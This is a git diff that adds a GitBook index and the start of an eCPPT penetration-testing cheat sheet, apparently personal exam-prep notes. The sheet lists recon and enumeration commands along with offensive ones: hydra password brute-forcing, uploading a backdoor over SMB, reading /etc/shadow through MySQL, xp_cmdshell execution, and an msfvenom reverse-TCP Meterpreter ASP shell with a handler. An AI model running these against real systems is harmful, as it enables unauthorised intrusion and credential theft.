+ * [1.2.3 Exploitation](readme/ecpptv3/powershell-for-pt/network-security/2.4.md)
+ * [1.2.4 Social Engineering](readme/ecpptv3/powershell-for-pt/network-security/2.4-2.md)
+ * [2๏ธโƒฃ 2 - Web Application Penetration Testing](readme/ecpptv3/web-app-security/README.md)
+ * [2.1 - Web App Concepts](readme/ecpptv3/web-app-security/5.1-web-app-concepts/README.md)
+ * [2.1.1 HTTP/S Protocol](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.1-http-s-protocol.md)
+ * [2.1.2 Encoding](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.2-encoding.md)
+ * [2.1.3 Same 
Origin](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.3-same-origin.md)
+ * [2.1.4 Cookies](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.4-cookies.md)
+ * [2.1.5 Session](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.5-session.md)
+ * [2.1.6 Web App Proxies](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.6-web-app-proxies.md)
+ * [2.2 - Information Gathering](readme/ecpptv3/web-app-security/5.2-information-gathering/README.md)
+ * [2.2.1 Gathering Information on Your Targets](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.1-gathering-information-on-your-targets.md)
+ * [2.2.2 Infrastructure](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.2-infrastructure.md)
+ * [2.2.3 Fingerprinting Frameworks and Applications](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.3-fingerprinting-frameworks-and-applications.md)
+ * [2.2.4 Fingerprinting Custom Applications](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.4-fingerprinting-custom-applications.md)
+ * [2.2.5 Enumerating Resources](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.5-enumerating-resources.md)
+ * [2.2.6 Information Disclosure Through Misconfiguration](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.6-information-disclosure-through-misconfiguration.md)
+ * [2.2.7 Google Hacking](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.7-google-hacking.md)
+ * [2.2.8 Shodan HQ](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.8-shodan-hq.md)
+ * [2.3 - Cross Site Scripting](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/README.md)
+ * [2.3.1 XSS Anatomy](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.1-cross-site-scripting.md)
+ * [2.3.2 Reflected XSS](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.2-anatomy-of-an-xss-exploitation.md)
+ * [2.3.3 Stored 
XSS](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.3-the-three-types-of-xss.md)
+ * [2.3.4 DOM-Based XSS](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.4-finding-xss.md)
+ * [2.3.5 Identifying & Exploiting XSS with XSSer](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.5-xss-exploitation.md)
+ * [2.4 - SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/README.md)
+ * [2.4.1 Introduction to SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.1-introduction-to-sql-injection.md)
+ * [2.4.2 Finding SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.2-finding-sql-injection.md)
+ * [2.4.3 Exploiting In-Band SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.3-exploiting-in-band-sql-injection.md)
+ * [2.4.4 Exploiting Error-Based SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.4-exploiting-error-based-sql-injection.md)
+ * [2.4.5 Exploiting Blind SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.5-exploiting-blind-sql-injection.md)
+ * [2.4.6 SQLMap](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.6-sqlmap.md)
+ * [2.4.7 Mitigation Strategies](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.7-mitigation-strategies.md)
+ * [2.4.8 From SQLi to Server Takeover](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.8-from-sqli-to-server-takeover.md)
+ * [2.5 - Other Common Web Attacks](readme/ecpptv3/web-app-security/5.5-other-common-web-attacks/README.md)
+ * [2.5.1 Session Attacks](readme/ecpptv3/web-app-security/5.5-other-common-web-attacks/5.5.1-session-attacks.md)
+ * [2.5.2 CSRF](readme/ecpptv3/web-app-security/5.5-other-common-web-attacks/5.5.2-csrf.md)
+ * [2.5.3 File and Resource Attacks](readme/ecpptv3/web-app-security/5.5-other-common-web-attacks/5.5.3-file-and-resource-attacks.md)
+ * [3๏ธโƒฃ 3 - Network Security](readme/ecpptv3/network-security/README.md)
+ * [3.1 Network Based 
Attacks](readme/ecpptv3/network-security/2.1-1.md)
+ * [3.2 Linux Vulnerabilities](readme/ecpptv3/network-security/4.1-linux-vulnerabilities.md)
+ * [3.3 - Exploitation](readme/ecpptv3/network-security/2.4/README.md)
+ * [3.3.1 Linux Exploitation](readme/ecpptv3/network-security/2.4/4.2-linux-exploitation.md)
+ * [4๏ธโƒฃ 4 - Exploit Development](readme/ecpptv3/system-security/README.md)
+ * [4.1 Architecture Foundamentals](readme/ecpptv3/system-security/1.1-architecture-foundamentals.md)
+ * [4.2 Assemblers and Tools](readme/ecpptv3/system-security/1.2-assemblers-and-tools.md)
+ * [4.3 Buffer Overflow](readme/ecpptv3/system-security/1.3-buffer-overflow.md)
+ * [4.4 Cryptography](readme/ecpptv3/system-security/1.4-cryptography.md)
+ * [4.5 Malware](readme/ecpptv3/system-security/1.5-malware.md)
+ * [4.6 Shellcoding](readme/ecpptv3/system-security/1.6-shellcoding.md)
+ * [5๏ธโƒฃ 5 - Post-Exploitation](readme/ecpptv3/linux-exploitation/README.md)
+ * [5.1 Linux Post-Exploitation](readme/ecpptv3/linux-exploitation/4.3-linux-post-exploitation.md)
+ * [5.2 - Linux Privilege Escalation](readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/README.md)
+ * [5.2.1 Kernel Exploitation](readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.1-kernel-exploitation.md)
+ * [5.2.2 SUID Exploitation](readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md)
+ * [5.2.3 CronJobs](readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.3-cronjobs.md)
+ * [5.3 - Post Expolitation / Pivoting](readme/ecpptv3/linux-exploitation/2.4-1/README.md)
+ * [5.3.1 Pivoting Guidelines](readme/ecpptv3/linux-exploitation/2.4-1/2.2-pivoting.md)
+ * [5.3.2 Pivoting Example (3 Targets)](readme/ecpptv3/linux-exploitation/2.4-1/2.2-pivoting-1.md)
+ * [6๏ธโƒฃ 6 - โ€‹Red Teaming](readme/ecpptv3/wi-fi-security/README.md)
+ * [6.1 - Active Directory Penetration Testing](readme/ecpptv3/wi-fi-security/6.1-change-it.md)
+ * [6.2 - 
Command & Control (C2/C\&C)](readme/ecpptv3/wi-fi-security/6.1-change-it-1.md)
+ * [eCPPTv2](readme/readme/README.md)
+ * [1๏ธโƒฃ 1 - โ€‹System Security](readme/readme/system-security/README.md)
+ * [1.1 Architecture Foundamentals](readme/readme/system-security/1.1-architecture-foundamentals.md)
+ * [1.2 Assemblers and Tools](readme/readme/system-security/1.2-assemblers-and-tools.md)
+ * [1.3 Buffer Overflow](readme/readme/system-security/1.3-buffer-overflow.md)
+ * [1.4 Cryptography](readme/readme/system-security/1.4-cryptography.md)
+ * [1.5 Malware](readme/readme/system-security/1.5-malware.md)
+ * [1.6 Shellcoding](readme/readme/system-security/1.6-shellcoding.md)
+ * [2๏ธโƒฃ 2 - Network Security](readme/readme/network-security/README.md)
+ * [2.1 System/Host Based Attacks](readme/readme/network-security/2.1/README.md)
+ * [2.1.1 Windows Vulnerabilities](readme/readme/network-security/2.1/windows-vulnerabilities.md)
+ * [2.2 Network Based Attacks](readme/readme/network-security/2.1-1.md)
+ * [2.3 The Metasploit Framework (MSF)](readme/readme/network-security/2.3/README.md)
+ * [MSF Introduction](readme/readme/network-security/2.3/msf-introduction.md)
+ * [Information Gathering & Enumeration](readme/readme/network-security/2.3/information-gathering-and-enumeration.md)
+ * [Vulnerability Scanning](readme/readme/network-security/2.3/vulnerability-scanning.md)
+ * [Client-Side Attacks](readme/readme/network-security/2.3/client-side-attacks.md)
+ * [Post Exploitation](readme/readme/network-security/2.3/post-exploitation.md)
+ * [Armitage](readme/readme/network-security/2.3/armitage.md)
+ * [2.4 Exploitation](readme/readme/network-security/2.4.md)
+ * [2.5 - Post Expolitation / Pivoting](readme/readme/network-security/2.4-1/README.md)
+ * [2.5.1 Pivoting Guidelines](readme/readme/network-security/2.4-1/2.2-pivoting.md)
+ * [2.5.2 Pivoting Example (3 Targets)](readme/readme/network-security/2.4-1/2.2-pivoting-1.md)
+ * [2.6 Social 
Engineering](readme/readme/network-security/2.4-2.md)
+ * [3๏ธโƒฃ 3 - PowerShell for PT](readme/readme/powershell-for-pt/README.md)
+ * [3.1 PowerShell](readme/readme/powershell-for-pt/3.1.md)
+ * [4๏ธโƒฃ 4 - Linux Exploitation](readme/readme/linux-exploitation/README.md)
+ * [4.1 Linux Vulnerabilities](readme/readme/linux-exploitation/4.1-linux-vulnerabilities.md)
+ * [4.2 Linux Exploitation](readme/readme/linux-exploitation/4.2-linux-exploitation.md)
+ * [4.3 Linux Post-Exploitation](readme/readme/linux-exploitation/4.3-linux-post-exploitation.md)
+ * [4.4 Linux Privilege Escalation](readme/readme/linux-exploitation/4.4-linux-privilege-escalation/README.md)
+ * [4.4.1 Kernel Exploitation](readme/readme/linux-exploitation/4.4-linux-privilege-escalation/4.4.1-kernel-exploitation.md)
+ * [4.4.2 SUID Exploitation](readme/readme/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md)
+ * [4.4.3 CronJobs](readme/readme/linux-exploitation/4.4-linux-privilege-escalation/4.4.3-cronjobs.md)
+ * [5๏ธโƒฃ 5 - Web App Security](readme/readme/web-app-security/README.md)
+ * [5.1 - Web App Concepts](readme/readme/web-app-security/5.1-web-app-concepts/README.md)
+ * [5.1.1 HTTP/S Protocol](readme/readme/web-app-security/5.1-web-app-concepts/5.1.1-http-s-protocol.md)
+ * [5.1.2 Encoding](readme/readme/web-app-security/5.1-web-app-concepts/5.1.2-encoding.md)
+ * [5.1.3 Same Origin](readme/readme/web-app-security/5.1-web-app-concepts/5.1.3-same-origin.md)
+ * [5.1.4 Cookies](readme/readme/web-app-security/5.1-web-app-concepts/5.1.4-cookies.md)
+ * [5.1.5 Session](readme/readme/web-app-security/5.1-web-app-concepts/5.1.5-session.md)
+ * [5.1.6 Web App Proxies](readme/readme/web-app-security/5.1-web-app-concepts/5.1.6-web-app-proxies.md)
+ * [5.2 - Information Gathering](readme/readme/web-app-security/5.2-information-gathering/README.md)
+ * [5.2.1 Gathering Information on Your 
Targets](readme/readme/web-app-security/5.2-information-gathering/5.2.1-gathering-information-on-your-targets.md)
+ * [5.2.2 Infrastructure](readme/readme/web-app-security/5.2-information-gathering/5.2.2-infrastructure.md)
+ * [5.2.3 Fingerprinting Frameworks and Applications](readme/readme/web-app-security/5.2-information-gathering/5.2.3-fingerprinting-frameworks-and-applications.md)
+ * [5.2.4 Fingerprinting Custom Applications](readme/readme/web-app-security/5.2-information-gathering/5.2.4-fingerprinting-custom-applications.md)
+ * [5.2.5 Enumerating Resources](readme/readme/web-app-security/5.2-information-gathering/5.2.5-enumerating-resources.md)
+ * [5.2.6 Information Disclosure Through Misconfiguration](readme/readme/web-app-security/5.2-information-gathering/5.2.6-information-disclosure-through-misconfiguration.md)
+ * [5.2.7 Google Hacking](readme/readme/web-app-security/5.2-information-gathering/5.2.7-google-hacking.md)
+ * [5.2.8 Shodan HQ](readme/readme/web-app-security/5.2-information-gathering/5.2.8-shodan-hq.md)
+ * [5.3 - Cross Site Scripting](readme/readme/web-app-security/5.3-cross-site-scripting/README.md)
+ * [5.3.1 XSS Anatomy](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.1-cross-site-scripting.md)
+ * [5.3.2 Reflected XSS](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.2-anatomy-of-an-xss-exploitation.md)
+ * [5.3.3 Stored XSS](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.3-the-three-types-of-xss.md)
+ * [5.3.4 DOM-Based XSS](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.4-finding-xss.md)
+ * [5.3.5 Identifying & Exploiting XSS with XSSer](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.5-xss-exploitation.md)
+ * [5.4 - SQL Injection](readme/readme/web-app-security/5.4-sql-injection/README.md)
+ * [5.4.1 Introduction to SQL Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.1-introduction-to-sql-injection.md)
+ * [5.4.2 Finding SQL 
Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.2-finding-sql-injection.md)
+ * [5.4.3 Exploiting In-Band SQL Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.3-exploiting-in-band-sql-injection.md)
+ * [5.4.4 Exploiting Error-Based SQL Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.4-exploiting-error-based-sql-injection.md)
+ * [5.4.5 Exploiting Blind SQL Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.5-exploiting-blind-sql-injection.md)
+ * [5.4.6 SQLMap](readme/readme/web-app-security/5.4-sql-injection/5.4.6-sqlmap.md)
+ * [5.4.7 Mitigation Strategies](readme/readme/web-app-security/5.4-sql-injection/5.4.7-mitigation-strategies.md)
+ * [5.4.8 From SQLi to Server Takeover](readme/readme/web-app-security/5.4-sql-injection/5.4.8-from-sqli-to-server-takeover.md)
+ * [5.5 - Other Common Web Attacks](readme/readme/web-app-security/5.5-other-common-web-attacks/README.md)
+ * [5.5.1 Session Attacks](readme/readme/web-app-security/5.5-other-common-web-attacks/5.5.1-session-attacks.md)
+ * [5.5.2 CSRF](readme/readme/web-app-security/5.5-other-common-web-attacks/5.5.2-csrf.md)
+ * [6๏ธโƒฃ 6 - โ€‹Wi-Fi Security](readme/readme/wi-fi-security/README.md)
+ * [6.1 Traffic Analysis](readme/readme/wi-fi-security/6.1-change-it.md)
+ * [7๏ธโƒฃ 7 - โ€‹Metasploit & Ruby](readme/readme/metasploit-and-ruby/README.md)
+ * [7.1 Metasploit](readme/readme/metasploit-and-ruby/7.1.md)
+ * [๐Ÿ“„ Report](readme/readme/metasploit-and-ruby-1/README.md)
+ * [How to write a PT Report](readme/readme/metasploit-and-ruby-1/7.1.md)
+* [๐Ÿ›ฃ๏ธ RoadMap & My Experience](roadmap-and-my-experience.md)
+* [๐Ÿ“” eCPPT Cheat Sheet](ecppt-cheat-sheet.md)
diff --git a/ecppt-cheat-sheet.md b/ecppt-cheat-sheet.md
new file mode 100644
index 0000000..9736cfb
--- /dev/null
+++ b/ecppt-cheat-sheet.md
@@ -0,0 +1,3567 @@
+# ๐Ÿ“” eCPPT Cheat Sheet
+
+#### Networking
+
+
+
+**Routing**
+
+```
+# Linux
+ip route
+
+# Windows
+route print
+
+# Mac OS X / Linux
+netstat -r
+```
+
+**IP**
+
+```
+# Linux
+ip a
+ip -br -c a
+
+# Windows
+ipconfig /all
+
+# Mac OS X / Linux
+ifconfig
+```
+
+**ARP**
+
+```
+# Linux
+ip neighbour
+
+# Windows
+arp -a
+
+# Mac OS X / Linux
+arp
+```
+
+**Ports**
+
+```
+# Linux
+netstat -tunp
+netstat -tulpn
+ss -tnl
+
+# Windows
+netstat -ano
+
+# Mac OS X / Linux
+netstat -p tcp -p udp
+lsof -n -i4TCP -i4UDP
+```
+
+**Connect and Scan**
+
+```
+nc -v example.com 80
+
+openssl s_client -connect :
+openssl s_client -connect : -debug
+openssl s_client -connect : -state
+openssl s_client -connect : -quiet
+
+# Scan port
+nc -zv
+```
+
+#### Information Gathering
+
+
+
+**Passive**
+
+```
+host
+whatweb
+whois
+whois
+
+dnsrecon -d
+
+wafw00f -l
+wafw00f -a
+
+sublist3r -d
+theHarvester -d
+theHarvester -d -b all
+```
+
+**Google Dorks**
+
+```
+site:
+inurl:
+site:*.sitename.com
+intitle:
+filetype:
+intitle:index of
+cache:
+inurl:auth_user_file.txt
+inurl:passwd.txt
+inurl:wp-config.bak
+```
+
+**DNS**
+
+```
+sudo nano /etc/hosts
+dnsenum
+# e.g. dnsenum zonetransfer.me
+
+dig
+dig axfr @DNS-server-name
+
+fierce --domain
+```
+
+**Host Discovery**
+
+```
+## Ping scan
+sudo nmap -sn
+## ARP scan
+netdiscover -i eth1 -r
+
+# NMAP PORT SCAN
+nmap
+## Skip ping
+nmap -Pn
+## Host discovery + saving into file
+nmap -sn / > hosts.txt
+nmap -sn -T4 / -oG - | awk '/Up$/{print $2}'
+## Scan all ports
+nmap -p-
+## Open ports scan + saving into file
+nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open
+## Port 80 only scan
+nmap -p 80
+## Custom list of ports scan
+nmap -p 80,445,3389,8080
+## Custom ports range scan
+nmap -p1-2000
+## Fast mode & verbose scan
+nmap -F -v
+## UDP scan
+nmap -sU
+## Service scan
+nmap -sV
+## Service + O.S. 
detection scan
+sudo nmap -sV -O
+## Default Scripts scan
+nmap -sC
+nmap -Pn -F -sV -O -sC
+## Aggressive scan
+nmap -Pn -F -A
+## Timing (T0=slow ... T5=insanely fast) scan
+nmap -Pn -F -T5 -sV -O -sC -v
+## Output scan
+nmap -Pn -F -oN outputfile.txt
+nmap -Pn -F -oX outputfile.xml
+## Output to all formats
+nmap -Pn -sV -sC -O -oA outputfile
+nmap -Pn -sV -sC -O -oA outputfile
+nmap -A -oA outputfile
+```
+
+#### Footprinting & Scanning
+
+
+
+**Network Discovery**
+
+```
+sudo arp-scan -I eth1
+ping
+sudo nmap -sn
+
+tracert google.com #Windows
+traceroute google.com #Linux
+
+## fping
+fping -I eth1 -g -a
+## fping with no "Host Unreachable errors"
+fping -I eth1 -g -a fping -I eth1 -g -a 2>/dev/null
+```
+
+#### Enumeration
+
+
+
+**SMB**
+
+
+
+**Nmap**
+
+```
+sudo nmap -p 445 -sV -sC -O
+nmap -sU --top-ports 25 --open
+
+nmap -p 445 --script smb-protocols
+nmap -p 445 --script smb-security-mode
+
+nmap -p 445 --script smb-enum-sessions
+nmap -p 445 --script smb-enum-sessions --script-args smbusername=,smbpassword=
+
+nmap -p 445 --script smb-enum-shares
+nmap -p 445 --script smb-enum-shares --script-args smbusername=,smbpassword=
+
+nmap -p 445 --script smb-enum-users --script-args smbusername=,smbpassword=
+
+nmap -p 445 --script smb-server-stats --script-args smbusername=,smbpassword=
+
+nmap -p 445 --script smb-enum-domains--script-args smbusername=,smbpassword=
+
+nmap -p 445 --script smb-enum-groups--script-args smbusername=,smbpassword=
+
+nmap -p 445 --script smb-enum-services --script-args smbusername=,smbpassword=
+
+nmap -p 445 --script smb-enum-shares,smb-ls --script-args smbusername=,smbpassword=
+
+nmap -p 445 --script smb-os-discovery
+
+nmap -p445 --script=smb-vuln-*
+```
+
+**Nmblookup**
+
+
nmblookup -A <TARGET_IP>
+
+
+**SMBMap**
+
+```
+smbmap -u guest -p "" -d . -H
+
+smbmap -u -p '' -d . -H
+
+## Run a command
+smbmap -u -p '' -H -x 'ipconfig'
+## List all drives
+smbmap -u -p '' -H -L
+## List dir content
+smbmap -u -p '' -H -r 'C$'
+## Upload a file
+smbmap -u -p '' -H --upload '/root/sample_backdoor' 'C$\sample_backdoor'
+## Download a file
+smbmap -u -p '' -H --download 'C$\flag.txt'
+```
+
+**SMB Connection**
+
+```
+# Connection
+smbclient -L -N
+smbclient -L -U
+smbclient /// -U
+smbclient ///admin -U admin
+smbclient ///public -N #NULL Session
+## SMBCLIENT
+smbclient ///share_name
+help
+ls
+get
+```
+
+**RPCClient**
+
+```
+rpcclient -U "" -N
+## RPCCLIENT
+enumdomusers
+enumdomgroups
+lookupnames admin
+```
+
+**Enum4Linux**
+
+```
+enum4linux -o
+enum4linux -U
+enum4linux -S
+enum4linux -G
+enum4linux -i
+enum4linux -r -u "" -p ""
+enum4linux -a -u "" -p ""
+enum4linux -U -M -S -P -G
+
+## NULL SESSIONS
+
+# 1 - Use โ€œenum4linux -nโ€ to make sure if โ€œ<20>โ€ exists:
+enum4linux -n
+# 2 - If โ€œ<20>โ€ exists, it means Null Session could be exploited. Utilize the following command to get more details:
+enum4linux
+# 3 - If confirmed that Null Session exists, you can remotely list all share of the target:
+smbclient -L WORKGROUP -I -N -U ""
+# 4 - You also can connect the remote server by applying the following command:
+smbclient \\\\\\c$ -N -U ""
+# 5 - Download those files stored on the share drive:
+smb: \> get file_shared.txt
+```
+
+**Hydra**
+
+```
+gzip -d /usr/share/wordlists/rockyou.txt.gz
+
+hydra -l admin -P /usr/share/wordlists/rockyou.txt smb
+```
+
+We can use a wordlist generator tools (how [Cewl](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/cewl)), to create custom wordlists. 
+
+**Metasploit**
+
+```
+# METASPLOIT Starting
+msfconsole
+msfconsole -q
+
+# METASPLOIT SMB
+use auxiliary/scanner/smb/smb_version
+use auxiliary/scanner/smb/smb_enumusers
+use auxiliary/scanner/smb/smb_enumshares
+use auxiliary/scanner/smb/smb_login
+use auxiliary/scanner/smb/pipe_auditor
+
+## set options depends on the selected module
+set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
+set SMBUser
+set RHOSTS
+exploit
+```
+
+**FTP**
+
+
+
+**Nmap**
+
+```
+sudo nmap -p 21 -sV -sC -O
+nmap -p 21 -sV -O
+
+nmap -p 21 --script ftp-anon
+nmap -p 21 --script ftp-brute --script-args userdb=
+```
+
+**Ftp Client**
+
+```
+ftp
+ls
+cd /../..
+get
+put
+```
+
+**Hydra**
+
+```
+hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -t 4 ftp
+```
+
+**SSH**
+
+
+
+**Nmap**
+
+```
+# NMAP
+sudo nmap -p 22 -sV -sC -O
+
+nmap -p 22 --script ssh2-enum-algos
+nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full
+nmap -p 22 --script ssh-auth-methods --script-args="ssh.user="
+
+nmap -p 22 --script=ssh-run --script-args="ssh-run.cmd=cat /home/student/FLAG, ssh-run.username=, ssh-run.password="
+
+nmap -p 22 --script=ssh-brute --script-args userdb=
+```
+
+**Netcat**
+
+```
+# NETCAT
+nc
+nc 22
+```
+
+**SSH**
+
+```
+ssh @ 22
+ssh root@ 22
+```
+
+**Hydra**
+
+```
+hydra -l -P /usr/share/wordlists/rockyou.txt ssh
+```
+
+**Metasploit**
+
+```
+use auxiliary/scanner/ssh/ssh_login
+
+set RHOSTS
+set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
+set STOP_ON_SUCCESS true
+set VERBOSE true
+exploit
+```
+
+**HTTP**
+
+
+
+**Nmap**
+
+```
+sudo nmap -p 80 -sV -O
+
+nmap -p 80 --script=http-enum -sV
+nmap -p 80 --script=http-headers -sV
+nmap -p 80 --script=http-methods --script-args http-methods.url-path=/webdav/
+nmap -p 80 --script=http-webdav-scan --script-args http-methods.url-path=/webdav/
+```
+
+**Alternative**
+
+```
+whatweb
+http
+browsh 
--startup-url http://
+
+dirb http://
+dirb http:// /usr/share/metasploit-framework/data/wordlists/directory.txt
+
+hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/ #brute http basic auth
+hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/ #brute http digest
+hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed" # brute http post form
+hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v" #brute http authenticated post form
+
+wget
+curl | more
+curl -I http:///
+curl --digest -u : http:///
+
+lynx
+```
+
+**Metasploit**
+
+```
+use auxiliary/scanner/http/brute_dirs
+use auxiliary/scanner/http/robots_txt
+use auxiliary/scanner/http/http_header
+use auxiliary/scanner/http/http_login
+use auxiliary/scanner/http/http_version
+
+# Global set
+setg RHOSTS
+setg RHOST
+
+## set options depends on the selected module
+set HTTP_METHOD GET
+set TARGETURI //
+
+set USER_FILE
+set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
+set VERBOSE false
+set AUTH_URI //
+exploit
+```
+
+**SQL**
+
+
+
+**Nmap**
+
+```
+sudo nmap -p 3306 -sV -O
+
+nmap -p 3306 --script=mysql-empty-password
+nmap -p 3306 --script=mysql-info
+nmap -p 3306 --script=mysql-users --script-args="mysqluser='',mysqlpass=''"
+nmap -p 3306 --script=mysql-databases --script-args="mysqluser='',mysqlpass=''"
+nmap -p 3306 --script=mysql-variables --script-args="mysqluser='',mysqlpass=''"
+
+nmap -p 3306 --script=mysql-audit --script-args="mysql-audit.username='',mysql-audit.password='',mysql-audit.filename=''"
+
+nmap -p 3306 --script=mysql-dump-hashes --script-args="username='',password=''"
+
+nmap -p 3306 --script=mysql-query --script-args="query='select count(*) from 
.;',username='',password=''"
+
+nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.13
+
+## Microsoft SQL
+nmap -sV -sC -p 1433
+
+nmap -p 1433 --script ms-sql-info
+nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433
+nmap -p 1433 --script ms-sql-empty-password
+
+nmap -p 3306 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt
+
+nmap -p 3306 --script ms-sql-query --script-args mssql.username=,mssql.password=,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt
+
+nmap -p 3306 --script ms-sql-dump-hashes --script-args mssql.username=,mssql.password=
+
+nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=,mssql.password=,ms-sql-xp-cmdshell.cmd="ipconfig"
+
+nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=,mssql.password=,ms-sql-xp-cmdshell.cmd="type c:\flag.txt"
+```
+
+```
+# MYSQL
+mysql -h -u
+mysql -h -u root
+
+# Mysql client
+help
+show databases;
+use ;
+select count(*) from ;
+select load_file("/etc/shadow");
+```
+
+**Hydra**
+
+```
+hydra -l -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt mysql
+```
+
+**Metasploit**
+
+```
+use auxiliary/scanner/mysql/mysql_schemadump
+use auxiliary/scanner/mysql/mysql_writable_dirs
+use auxiliary/scanner/mysql/mysql_file_enum
+use auxiliary/scanner/mysql/mysql_hashdump
+use auxiliary/scanner/mysql/mysql_login
+
+## MS Sql
+use auxiliary/scanner/mssql/mssql_login
+use auxiliary/admin/mssql/mssql_enum
+use auxiliary/admin/mssql/mssql_enum_sql_logins
+use auxiliary/admin/mssql/mssql_exec
+use auxiliary/admin/mssql/mssql_enum_domain_accounts
+
+# Global set
+setg RHOSTS
+setg RHOST
+
+## set options depends on the selected module
+set USERNAME root
+set PASSWORD ""
+
+set DIR_LIST 
/usr/share/metasploit-framework/data/wordlists/directory.txt
+set VERBOSE false
+set PASSWORD ""
+
+set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
+set PASSWORD ""
+
+set USER_FILE /root/Desktop/wordlist/common_users.txt
+set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
+set VERBOSE false
+set STOP_ON_SUCCESS true
+
+set CMD whoami
+exploit
+```
+
+**SMTP**
+
+
+
+**Nmap**
+
+```
+sudo nmap -p 25 -sV -sC -O
+
+nmap -sV -script banner
+```
+
+```
+nc 25
+telnet 25
+
+# TELNET client - check supported capabilities
+HELO attacker.xyz
+EHLO attacker.xyz
+```
+
+```
+smtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t
+```
+
+**Metasploit**
+
+```
+# METASPLOIT
+service postgresql start && msfconsole -q
+
+# Global set
+setg RHOSTS
+setg RHOST
+
+use auxiliary/scanner/smtp/smtp_enum
+```
+
+#### Vulnerability Assessment
+
+
+
+```
+# HEARTBLEED
+nmap -sV --script ssl-enum-ciphers -p
+nmap -sV --script ssl-heartbleed -p 443
+
+# ETERNALBLUE
+nmap --script smb-vuln-ms17-010 -p 445
+
+# BLUEKEEP
+msfconsole
+use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
+
+# LOG4J
+nmap --script log4shell.nse --script-args log4shell.callback-server=:1389 -p 8080
+```
+
+```
+searchsploit badblue 2.7
+```
+
+#### Host Based Attacks
+
+
+
+**Windows Exploitation**
+
+
+
+**IIS WEBDAV**
+
+```
+# IIS WEBDAV
+davtest -url
+davtest -auth : -url http:///webdav
+
+cadaver [OPTIONS]
+
+nmap -p 80 --script http-enum -sV
+```
+
+```
+msfvenom -p LHOST= LPORT= -f > shell.asp
+
+msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
+```
+
+```
+hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt http-get /webdav/
+```
+
+```
+## METASPLOIT
+# Global set
+setg RHOSTS
+setg RHOST
+
+use exploit/multi/handler
